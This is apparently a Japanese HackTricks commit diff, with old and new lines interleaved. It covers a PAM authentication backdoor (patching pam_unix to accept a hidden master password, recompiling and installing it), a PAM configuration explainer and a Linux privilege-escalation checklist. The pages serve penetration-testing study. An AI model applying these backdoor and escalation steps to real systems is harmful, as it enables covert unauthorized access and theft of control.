### `pam_unix.so`の変更手順:
1. **`common-auth`ファイル内の認証ディレクティブを特定**:
- ユーザーのパスワードをチェックする責任がある行は`pam_unix.so`を呼び出します。
2. **ソースコードの変更**:
- `pam_unix_auth.c`ソースファイルに条件付きステートメントを追加し、事前定義されたパスワードが使用された場合にアクセスを許可し、それ以外の場合は通常の認証プロセスを続行します。
3. **変更した`pam_unix.so`ライブラリを再コンパイルして置き換える**
4. **テスト**:
- 事前定義されたパスワードを使用して、通常の認証プロセスに影響を与えずに、さまざまなサービスログイン、ssh、sudo、su、スクリーンセーバーへのアクセスが許可されます。
`pam_unix_auth.c`を再コンパイルし、`pam_unix.so`ファイルを置き換えます。
```bash
make
sudo cp \
/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \
/lib/x86_64-linux-gnu/security/
```
{% hint style="info" %}
このプロセスを[https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)で自動化することができます。
[https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)を使用してこのプロセスを自動化できます。
{% endhint %}
## 参考文献
* [https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)
* [https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)
<details>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

62
linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
View file

@ -4,20 +4,25 @@
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする**
* **ハッキングトリックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
- **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、**あなたのハッキングテクニックを共有**する
</details>
PAMは、システム上のサービスとそのユーザーの間に障壁を形成するモジュールのコレクションです。これらのモジュールには、特定のUNIXグループまたはネットグループ、サブネットなどからのユーザーのログインを許可しないようにする、あるいは'研究'グループがシステムリソースを独占できないようにリソース制限を実装するなど、さまざまな目的があります。
## 基本情報
# 設定ファイル
**PAMPluggable Authentication Modules**は、**コンピューターサービスにアクセスしようとするユーザーの身元を検証**し、さまざまな基準に基づいてアクセスを制御するセキュリティメカニズムとして機能します。これは、特定のサービスにのみ認証されたユーザーが関わることを確認し、システムの過負荷を防ぐために使用を制限するデジタルゲートキーパーのようなものです。
Solarisや他の商用UNIXシステムは、**`/etc/pam.conf`** という単一のファイルを中心にしたわずかに異なる構成モデルを持っています。ほとんどのLinuxシステムでは、これらの設定ファイルは **`/etc/pam.d`** にあり、サービスに基づいて名前が付けられています。たとえば、'login'の設定ファイルは **`/etc/pam.d/login`** と呼ばれています。そのファイルのバージョンを簡単に見てみましょう:
### 設定ファイル
- **SolarisおよびUNIXベースのシステム**では、一般的に`/etc/pam.conf`に配置された中央の設定ファイルを使用します。
- **Linuxシステム**では、ディレクトリアプローチを好み、サービス固有の設定を`/etc/pam.d`内に保存します。たとえば、ログインサービスの設定ファイルは`/etc/pam.d/login`にあります。
ログインサービスのPAM設定の例は次のようになります
```text
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
@ -30,34 +35,27 @@ password required /lib/security/pam_ldap.so
password required /lib/security/pam_pwdb.so use_first_pass
session required /lib/security/pam_unix_session.so
```
## **PAM管理領域**
### **PAM管理領域**
左端の列には、PAM管理の4つの領域を表す4つのユニークな単語が含まれています: **auth**、**account**、**password**、**session**。多くのモジュールがこれらの領域の複数をサポートしています実際、pam_unixはすべてをサポートしています、一方、pam_cracklibのような他のモジュールは1つにしか適していませんpam_cracklibの場合は「password」機能
これらの領域、または管理グループには、**auth**、**account**、**password**、**session**が含まれ、それぞれ認証およびセッション管理プロセスの異なる側面に責任を持ちます:
* **auth**: auth領域私はそれを領域と呼びます - ドキュメントでは「管理グループ」または「機能」と言及されています)は、ユーザーが自分自身であることを確認する責任があります。この領域にリストされるモジュールは、**パスワードの入力を促す**ことを**一般的に**サポートしています。
* **account**: この領域は、さまざまな**アカウント検証機能**に責任を持ちます。この機能には多くのモジュールが利用可能です。**グループメンバーシップの確認**、時間帯、ユーザーアカウントがローカルかリモートかなどに基づくサービスの利用に制約を課すことは、一般的にこの機能をサポートするモジュールによって強制されます。
* **password**: この領域のモジュールは、特定のサービスの**パスワードの更新**に必要な機能を担当します。ほとんどの場合、このセクションは非常に単調で、単に**現在のパスワードの入力を促し**、それが成功した場合は新しいパスワードの入力を促します。他のモジュールは、pam_cracklibやpam_pwcheckモジュールによって実行されるような**パスワードの複雑さ**や辞書チェックを実行するために追加できます。
* **session**: この領域のモジュールは、特定のユーザーのサービスの**セットアップやクリーンアップ中に発生する**さまざまな作業を実行します。これには、システム全体の初期化スクリプトの起動、特別なログ記録の実行、**ユーザーのホームディレクトリのマウント**、リソース制限の設定などが含まれる場合があります。
- **Auth**: ユーザーのアイデンティティを検証し、しばしばパスワードの入力を求めます。
- **Account**: アカウントの検証を処理し、グループのメンバーシップや特定の時間帯の制限などの条件をチェックします。
- **Password**: 複雑さのチェックや辞書攻撃の防止など、パスワードの更新を管理します。
- **Session**: サービスセッションの開始や終了時にアクションを管理し、ディレクトリのマウントやリソース制限の設定などを行います。
## **PAMモジュールコントロール**
### **PAMモジュールの制御**
**中央の列**には、モジュールが成功または失敗した場合に**PAMが何をすべきかを実質的に決定する**キーワードが含まれています。これらのキーワードはPAM用語では「**コントロール**」と呼ばれます。90%の場合、一般的なキーワード(**requisite**、**required**、**sufficient**、**optional**のいずれかを使用できます。ただし、これはPAMの柔軟性とパワーを解放するための氷山の一角に過ぎません。
制御は、モジュールの成功または失敗に対する応答を決定し、全体的な認証プロセスに影響を与えます。これには次のものが含まれます:
* **required**: requiredモジュールが**successでないステータス**を返すと、**操作は常に失敗します**が、**その下のモジュールが呼び出された後**にのみ失敗します。これは初めて見ると無意味に思えるかもしれませんが、**サービスを利用しようとするユーザーの視点からは常に同じ方法で動作する**ことを目的としています。その結果、潜在的なクラッカーが**どの** **モジュール**が**失敗**の原因であるかを**特定**するのが**不可能**になります。
* **requisite**: requisiteモジュールが失敗すると、**操作は失敗するだけでなく**、他のモジュールを呼び出さずに**即座に** **失敗**で終了します。
* **sufficient**: **sufficient**モジュールが**成功**すると、その領域の**十分なモジュールの要件を満たす**のに十分であり、**その下にあるsufficientとしてリストされたモジュールは呼び出されません**。**失敗すると、その後に呼び出されるモジュールが成功しない限り、操作は失敗します**
* **optional**: ''optionalモジュールは、pam\(8\)マニュアルによると、その機能のスタック内で**唯一のモジュール**である場合にのみ、操作を失敗させます。
- **Required**: 必須モジュールの失敗は最終的に失敗につながりますが、すべての後続モジュールがチェックされた後にのみ失敗します。
- **Requisite**: 失敗時にプロセスが直ちに終了します。
- **Sufficient**: 成功すると、後続のモジュールが失敗しない限り、同じ領域のチェックがバイパスされます
- **Optional**: スタック内で唯一のモジュールである場合にのみ失敗の原因となります。
## 例
### シナリオ
例のファイルでは、auth領域にスタックされた4つのモジュールがあります:
```text
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_env.so
auth sufficient /lib/security/pam_ldap.so
auth required /lib/security/pam_unix.so try_first_pass
```
1. **pam\_securetty**モジュールは、その設定ファイルである**`/etc/securetty`**をチェックし、このログインに使用されている端末がファイルにリストされているかどうかを確認します。もしリストされていない場合、**rootログインは許可されません**。'bad'端末でrootとしてログインしようとすると、このモジュールは失敗します。'required'であるため、スタック内のすべてのモジュールを呼び出します。しかし、それらがすべて成功しても、ログインは失敗します。興味深いのは、もしモジュールが'requisite'としてリストされていた場合、操作はすぐに失敗して他のモジュールを呼び出さずに終了します。
2. **pam\_env**モジュールは、管理者が**`/etc/security/pam_env.conf`**で設定した内容に基づいて**環境変数を設定**します。Redhat 9、Fedora Core 1、Mandrake 9.2のデフォルトセットアップでは、このモジュールの構成ファイルは実際には変数を設定しません。SSH経由でログインするユーザーのためにDISPLAY環境変数を自動的に設定するなど、良い使い道がありますただし、OpenSSHが自動的に処理することもできます
3. **pam\_ldap**モジュールは、ユーザーに**パスワードを要求**し、次に**`/etc/ldap.conf`**で指定されたldapディレクトリをチェックしてユーザーを認証します。これが失敗した場合、'pam\_unix'がユーザーを認証するのに成功しても操作は成功する可能性があります。pam\_ldapが成功した場合、'pam\_unix'は呼び出されません。
4. この場合の**pam\_unix**モジュールは、ユーザーにパスワードを要求しません。'try_first_pass'引数は、モジュールに**直前のモジュールこの場合はpam\_ldapから与えられたパスワードを使用**するよう指示します。標準のgetpw\*システムコールを使用してユーザーを認証しようとします。pam\_unixが失敗し、pam\_ldapも失敗した場合、操作は失敗します。pam\_ldapが失敗した場合でも、pam\_unixが成功した場合、操作は成功しますこれは、rootがldapディレクトリに含まれていないが、ローカルの/etc/passwdファイルにはまだ存在する場合に非常に役立ちます
複数の認証モジュールを持つセットアップでは、プロセスは厳密な順序に従います。`pam_securetty`モジュールがログイン端末を認証できないと判断した場合、rootログインがブロックされますが、その「必須」ステータスのため、すべてのモジュールが処理されます。`pam_env`は環境変数を設定し、ユーザーエクスペリエンスの向上に役立つ可能性があります。`pam_ldap`および`pam_unix`モジュールはユーザーの認証に協力し、`pam_unix`は以前に提供されたパスワードを使用しようとします。これにより、認証方法の効率性と柔軟性が向上します。
# 参考文献
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)

167
linux-hardening/linux-privilege-escalation-checklist.md
View file

@ -1,135 +1,134 @@
# チェックリスト - Linux 特権昇格
# チェックリスト - Linux特権昇格
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>で**ゼロからヒーローまでのAWSハッキングを学ぶ**</summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>で**ゼロからヒーローまでのAWSハッキングを学ぶ**</summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
- **HackTricks で企業を宣伝**したい場合や **HackTricks をPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェック!
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
- **Discordグループ**💬 に参加するか、[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 で **@hacktricks_live** をフォローする。
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **Discordグループ**に参加したり、[**Telegramグループ**](https://t.me/peass)に参加したり、**Twitter**で**フォロー**する🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取ろう!
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るために[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)サーバーに参加しましょう!
**ハッキングの洞察**\
ハッキングのスリルと挑戦に深く入り込むコンテンツに参加
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加
**リアルタイムハックニュース**\
リアルタイムのニュースと洞察を通じて、ハッキングの世界を最新の状態に保つ
リアルタイムのニュースと情報を通じてハッキングの世界を最新の状態に保つ
**最新のアナウンス**\
**最新のアナウンスメント**\
最新のバグバウンティの開始や重要なプラットフォームの更新情報を把握
**Discord** で [**参加**](https://discord.com/invite/N3FrSbmwdy) し、今日からトップハッカーと協力し始めよう!
**Discord**で[**参加**](https://discord.com/invite/N3FrSbmwdy)して、今日からトップハッカーと協力を始めましょう!
### **Linux ローカル特権昇格ベクターを探すための最適なツール:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
### **Linuxローカル特権昇格ベクターを探すための最良のツール:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
### [システム情報](privilege-escalation/#system-information)
- [ ] **OS情報**を取得する
- [ ] [**PATH**](privilege-escalation/#path)をチェックし、**書き込み可能なフォルダ**はあるか?
- [ ] [**環境変数**](privilege-escalation/#env-info)をチェックし、機密情報はあるか?
- [ ] スクリプトを使用して [**カーネルの脆弱性**](privilege-escalation/#kernel-exploits) を検索するDirtyCowなど
- [ ] [**sudoのバージョン**が脆弱かどうかをチェック](privilege-escalation/#sudo-version)する
- [ ] [**Dmesg** 署名検証に失敗](privilege-escalation/#dmesg-signature-verification-failed)
- [ ] その他のシステム列挙日付、システム統計、CPU情報、プリンタ)を行う([**詳細はこちら**](privilege-escalation/#more-system-enumeration)
- [ ] [さらなる防御策を列挙](privilege-escalation/#enumerate-possible-defenses)
- [ ] スクリプトを使用して[**カーネルの脆弱性**](privilege-escalation/#kernel-exploits)を検索するDirtyCowなど
- [ ] [**sudoバージョンが脆弱**](privilege-escalation/#sudo-version)かどうかを**チェック**
- [ ] [**Dmesg**署名検証に失敗](privilege-escalation/#dmesg-signature-verification-failed)
- [ ] 他のシステム列挙([日付、システム統計、CPU情報、プリンタ](privilege-escalation/#more-system-enumeration)
- [ ] [**さらなる防御策の列挙**](privilege-escalation/#enumerate-possible-defenses)
### [ドライブ](privilege-escalation/#drives)
- [ ] マウントされたドライブをリストアップする
- [ ] マウントされていないドライブはあるか?
- [ ] fstab に資格情報はあるか?
- [ ] fstabにクレデンシャルはあるか?
### [**インストールされたソフトウェア**](privilege-escalation/#installed-software)
- [ ] **インストールされた便利なソフトウェア**をチェックする([**詳細はこちら**](privilege-escalation/#useful-software)
- [ ] **インストールされた脆弱なソフトウェア**をチェックする([**詳細はこちら**](privilege-escalation/#vulnerable-software-installed)
- [ ] **インストールされた**[ **有用なソフトウェア**](privilege-escalation/#useful-software)をチェックする
- [ ] **インストールされた**[**脆弱なソフトウェア**](privilege-escalation/#vulnerable-software-installed)をチェックする
### [プロセス](privilege-escalation/#processes)
- [ ] **不明なソフトウェアが実行**か?
- [ ] **必要以上の権限で実行されているソフトウェア**があるか?
- [ ] 実行中のプロセスの **脆弱性を検索**する(特に実行中のバージョン)
- [ ] 実行中のプロセスのバイナリを **変更**できるか?
- [ ] プロセスを **監視**し、頻繁に実行されている興味深いプロセスがあるかどうかを確認する
- [ ] 興味深い **プロセスメモリ**(パスワードが保存されている可能性のある場所)を **読み取る**ことができるか?
- [ ] **不明なソフトウェアが実行**されているか?
- [ ] **適切でない権限で実行**されているソフトウェアはあるか?
- [ ] 実行中のプロセスの**脆弱性**を検索する(特に実行中のバージョン)
- [ ] 実行中のプロセスのバイナリを**変更**できるか?
- [ ] プロセスを**監視**し、興味深いプロセスが頻繁に実行されていないかをチェックする
- [ ] 興味深い**プロセスメモリ**(パスワードが保存されている可能性のある場所)を**読み取る**ことができるか?
### [スケジュールされた/Cronジョブ](privilege-escalation/#scheduled-jobs)
- [ ] いくつかの cron によって **PATH** が変更され、書き込み可能になっているか?
- [ ] cron ジョブに **ワイルドカード** があるか?
- [ ] 実行されている **変更可能なスクリプト** があるか、または **変更可能なフォルダ** の中にあるか?
- [ ] いくつかの **スクリプト** が非常に **頻繁に実行**されていることが検出されたか1分、2分、5分ごと
- [ ] 一部のcronによって[**PATH** ](privilege-escalation/#cron-path)が変更され、書き込み可能になっているか?
- [ ] クロンジョブに[**ワイルドカード** ](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection)があるか?
- [ ] 実行されている[**変更可能なスクリプト** ](privilege-escalation/#cron-script-overwriting-and-symlink)があるか、または**変更可能なフォルダ**にあるか?
- [ ] いくつかの**スクリプト**が非常に**頻繁に実行**されていることを検出しましたか1分、2分、または5分ごと
### [サービス](privilege-escalation/#services)
- [ ] **書き込み可能な .service** ファイルはあるか?
- [ ] **サービス** によって実行される **書き込み可能なバイナリ** はあるか?
- [ ] systemd PATH **書き込み可能なフォルダ** はあるか?
- [ ] **サービス**によって実行される**書き込み可能なバイナリ**はあるか?
- [ ] systemd PATHに**書き込み可能なフォルダ**はあるか?
### [タイマー](privilege-escalation/#timers)
- [ ] **書き込み可能なタイマー** はあるか?
- [ ] **書き込み可能なタイマー**はあるか?
### [ソケット](privilege-escalation/#sockets)
- [ ] **書き込み可能な .socket** ファイルはあるか?
- [ ] 任意のソケットと **通信**できるか?
- [ ] 興味深い情報を持つ **HTTPソケット** はあるか?
- [ ] 任意のソケットと**通信**できるか?
- [ ] 興味深い情報を持つ**HTTPソケット**はあるか?
### [D-Bus](privilege-escalation/#d-bus)
- [ ] 任意の **D-Bus** **通信**できるか?
- [ ] 任意のD-Busと**通信**できるか?
### [ネットワーク](privilege-escalation/#network)
- ネットワークを列挙して、自分がどこにいるかを知る
- シェルを取得する前にアクセスできなかった **オープンポート** はあるか?
- `tcpdump` を使用して **トラフィックをスニッフ** できるか?
- 自分がどこにいるかを知るためにネットワークを列挙する
- シェル内でアクセスできなかった**オープンポート**はあるか?
- `tcpdump`を使用してトラフィックを**スニッフ**できるか?
### [ユーザー](privilege-escalation/#users)
- 一般的なユーザー/グループを **列挙** する
- **非常に大きなUID** を持っているか? **マシン****脆弱** か?
- 所属しているグループを通じて特権を昇格できか?
- **クリップボード** データは?
- 一般的なユーザー/グループを**列挙**する
- **非常に大きなUID**を持っていますか?**マシン**は**脆弱**ですか?
- 所属しているグループを通じて特権を昇格できますか?
- **クリップボード**のデータは?
- パスワードポリシーは?
- 以前に発見した **すべての既知のパスワード** を使用して、各 **可能なユーザー** でログインしてみる。パスワードなしでもログインできるかも試してみる
- 以前に発見した**すべての既知のパスワード**を使用して、**各**可能な**ユーザー**でログインしてみてください。パスワードなしでもログインできるかもしれません
### [書き込み可能なPATH](privilege-escalation/#writable-path-abuses)
- **PATH内のいくつかのフォルダに書き込み権限** がある場合、特権を昇格できるかもしれない
- **PATH内のいくつかのフォルダに書き込み権限**がある場合、特権を昇格できるかもしれません
### [SUDOSUIDコマンド](privilege-escalation/#sudo-and-suid)
### [SUDOおよびSUIDコマンド](privilege-escalation/#sudo-and-suid)
- **sudoで任意のコマンドを実行**できるか?それを使用して何かをルートとして **読み取り、書き込み、実行** できるか?([**GTFOBins**](https://gtfobins.github.io)
- **悪用可能なSUIDバイナリ** はあるか?([**GTFOBins**](https://gtfobins.github.io)
- **sudoコマンドがパスによって制限**されているか? 制限を **バイパス** できるか?
- **パスが指定されていないSudo/SUIDバイナリ** はあるか?([**詳細はこちら**](privilege-escalation/#sudo-command-suid-binary-without-command-path)
- **パスが指定されたSUIDバイナリ** はあるか? バイパスできるか?
- **LD\_PRELOAD脆弱性** はあるか?([**詳細はこちら**](privilege-escalation/#ld\_preload)
- 書き込み可能なフォルダからの **SUIDバイナリにおける.soライブラリの不足** はあるか?([**詳細はこちら**](privilege-escalation/#suid-binary-so-injection)
- **SUDOトークンが利用可能** か? [**SUDOトークンを作成**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)できか?
- **sudoersファイルを読み取るか変更** できるか?([**詳細はこちら**](privilege-escalation/#etc-sudoers-etc-sudoers-d)
- **/etc/ld.so.conf.d/** を **変更** できるか?([**詳細はこちら**](privilege-escalation/#etc-ld-so-conf-d)
- **OpenBSD DOAS** コマンド
- **sudoで任意のコマンドを実行**できますか?それを使用して何かをルートとして**読み取り、書き込み、実行**できますか?([**GTFOBins**](https://gtfobins.github.io)
- **悪用可能なSUIDバイナリ**はありますか?([**GTFOBins**](https://gtfobins.github.io)
- [**sudo**コマンドが**パス**で**制限**されていますか? 制限を**バイパス**できますか](privilege-escalation/#sudo-execution-bypassing-paths)?
- [**パスが指定されていないSudo/SUIDバイナリ**](privilege-escalation/#sudo-command-suid-binary-without-command-path)はありますか?
- [**パスが指定されているSUIDバイナリ**](privilege-escalation/#suid-binary-with-command-path)はありますか?バイパス
- [**LD\_PRELOAD脆弱性**](privilege-escalation/#ld\_preload)
- 書き込み可能なフォルダからのSUIDバイナリに**.soライブラリが不足**していますか?
- [**SUDOトークンが利用可能**](privilege-escalation/#reusing-sudo-tokens)ですか? [**SUDOトークンを作成**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)できますか?
- [**sudoersファイルを読み取る**](privilege-escalation/#etc-sudoers-etc-sudoers-d)ことができますか?
- [**/etc/ld.so.conf.d/**を**変更**](privilege-escalation/#etc-ld-so-conf-d)できますか?
- [**OpenBSD DOAS**](privilege-escalation/#doas)コマンド
### [機能](privilege-escalation/#capabilities)
- 任意のバイナリに **予期しない機能** があるか?
- 任意のバイナリに**予期しない機能**がありますか?
### [ACL](privilege-escalation/#acls)
- 任意のファイルに **予期しないACL** があるか?
- 任意のファイルに**予期しないACL**がありますか?
### [オープンシェルセッション](privilege-escalation/#open-shell-sessions)
@ -138,55 +137,47 @@ HackTricks をサポートする他の方法:
### [SSH](privilege-escalation/#ssh)
- **Debian** の [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
- **Debian**の[**OpenSSL予測可能なPRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
- [**SSHの興味深い構成値**](privilege-escalation/#ssh-interesting-configuration-values)
### [興味深いファイル](privilege-escalation/#interesting-files)
- **プロファイルファイル** - 機密データを読み取る? 特権昇格に書き込む?
- **passwd/shadowファイル** - 機密データを読み取る? 特権昇格に書き込む?
- 機密データが含まれる可能性のある **一般的に興味深いフォルダ** をチェックす
- **奇妙な場所/所有ファイル**、アクセス権があるか、実行可能ファイルを変更できるか
- **最後の数分で変更**されたファイル
- **プロファイルファイル** - 機密データを読み取ることができますか?特権昇格に書き込むことができますか
- **passwd/shadowファイル** - 機密データを読み取ることができますか?特権昇格に書き込むことができますか
- 一般的に興味深いフォルダをチェックして、機密データがないか確認しま
- **奇妙な場所/所有ファイル**、アクセス権限を持っているか、または実行可能ファイルを変更できるかもしれません
- 最後の数分で**変更**されましたか
- **Sqlite DBファイル**
- **隠しファイル**
- **PATH内のスクリプト/バイナリ**
- **スクリプト/バイナリPATH**
- **Webファイル**(パスワード?)
- **バックアップ**
- **パスワードを含む既知のファイル****Linpeas** **LaZagne** を使用
- **パスワードを含む既知のファイル****Linpeas**と**LaZagne**を使用します
- **一般的な検索**
### [**書き込み可能なファイル**](privilege-escalation/#writable-files)
- **Pythonライブラリを変更**して任意のコマンドを実行できか?
- **ログファイルを変更**できか? **Logtotten** exploit
- **/etc/sysconfig/network-scripts/** を変更できるか? Centos/Redhat exploit
- **ini、int.d、systemd、rc.dファイルに書き込む**ことができるか?([**詳細はこちら**](privilege-escalation/#init-init-d-systemd-and-rc-d)
- **Pythonライブラリを変更**して任意のコマンドを実行できますか?
- **ログファイルを変更**できますか? **Logtotten** exploit
- **/etc/sysconfig/network-scripts/**を変更できますか? Centos/Redhat exploit
- [**ini、int.d、systemd、rc.dファイルに書き込む**](privilege-escalation/#init-init-d-systemd-and-rc-d)ことができますか?
### [**その他のトリック**](privilege-escalation/#other-tricks)
- 特権昇格するために **NFSを悪用** できるか?
- **制限的なシェルから脱出**する必要があるか?([**詳細はこちら**](privilege-escalation/#escaping-from-restricted-shells)
- 特権を昇格するために**NFSを悪用**できますか?
- **制限的なシェルから脱出**する必要がありますか?
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取ろう!
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るために[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)サーバーに参加しましょう!
**ハッキングの洞察**\
ハッキングのスリルと挑戦に深く入り込むコンテンツに参加
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加
**リアルタイムハックニュース**\
リアルタイムのニュースと洞察を通じて、ハッキングの世界を最新の状態に保つ
リアルタイムのニュースと情報を通じてハッキングの世界を最新の状態に保つ
**最新のアナウンス**\
**最新のアナウンスメント**\
最新のバグバウンティの開始や重要なプラットフォームの更新情報を把握
**Discord** で [**参加**](https://discord.com/invite/N3FrSbmwdy) し、今日からトップハッカーと協力し始めよう!
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>で**ゼロからヒーローまでのAWSハッキングを学ぶ**</summary>
HackTricks をサポートする他の方法:
- **HackTricks で企業を宣
**Discord**で[**参加**](https://discord.com/invite/N3FrSbmwdy)して、今日からトップハッカーと協力を始めましょう!

787
linux-hardening/privilege-escalation/README.md
View file

File diff suppressed because it is too large Load diff

60
linux-hardening/privilege-escalation/cisco-vmanage.md
View file

@ -2,27 +2,33 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* サイバーセキュリティ会社で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
